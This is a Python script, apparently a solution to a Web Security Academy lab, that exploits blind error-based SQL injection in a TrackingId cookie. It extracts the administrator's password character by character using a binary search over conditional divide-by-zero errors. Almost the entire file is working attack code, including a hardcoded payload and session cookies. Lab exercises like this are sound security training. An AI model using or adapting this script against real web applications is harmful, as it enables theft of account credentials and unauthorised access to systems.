#!/usr/bin python3
# coding: utf-8
import requests

url = "https://acee1f8a1f88d24480a65915007d005b.web-security-academy.net/filter?category=Accessories"


def exp_password():
	"""爆破administrator账户的password"""
	res = []
	cookies_dic = {
		"TrackingId": "UMq6OTsVojf6P8L7",
		"session": "I7OpYfiPxgLyNUboj2rI0DyF6eoFr3i7"
	}
	for i in range(1, 50):
		l, r, mid = 32, 127, (32 + 127) // 2
		while l < r:
			cookies_dic[
				"TrackingId"
			] = f"UMq6OTsVojf6P8L7'||(select case when ascii(substr(password,{i},1))>{mid} then to_char(1/0) else '' end from users where username='administrator')||'"
			resp = requests.get(url=url, cookies=cookies_dic)
			if "Internal Server Error" in resp.text:
				# 这种情况为异常回显 ascii-val > mid
				l = mid + 1
			else:
				# 这种情况为正常回显 ascii-val <= mid
				r = mid
			mid = (l + r) // 2
		res.append(chr(int(mid)))
		print("".join(res))
		
if __name__ == "__main__":
	exp_password()